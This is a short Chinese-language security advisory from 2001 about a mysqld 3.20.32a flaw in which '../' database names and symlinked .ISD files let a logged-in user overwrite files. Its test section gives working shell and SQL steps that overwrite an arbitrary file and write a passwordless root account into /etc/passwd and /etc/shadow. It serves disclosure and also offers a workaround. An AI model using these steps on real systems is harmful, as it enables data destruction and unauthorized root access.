mysqld库文件创建漏洞
发布日期:2001-03-23
更新日期:2001-03-23
受影响系统:
mysql-3.20.32a,其它版本可能也存在此问题
描述:
任何可以用合法的用户名和密码登录进mysql的用户都可以利用mysqld来发起拒绝服
务攻击或者获得root权限,因为mysql视“../blah-blah”为合法的数据库名。其每
张表格是用3个文件表示的:tablename.ISD,tablename.ISM和tablename.frm,
但是mysqld在检查表格存在与否的时候仅仅检查tablename.frm。
<* 来源:Pavlov, Lesha (
lesha@nn.ru) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1、通过mysqld覆盖任意文件从而导致拒绝服务:
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
上述例子将覆盖/some/file/you/wish/to/overwrite。
2、通过mysqld获得root权限:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
建议:
临时解决办法:
NSFOCUS建议您将mysql数据库文件的属主改为普通用户,并以该普通用户的身份运行mysqld。
厂商补丁:
暂无。
浏览次数:4673
严重程度:0(网友投票)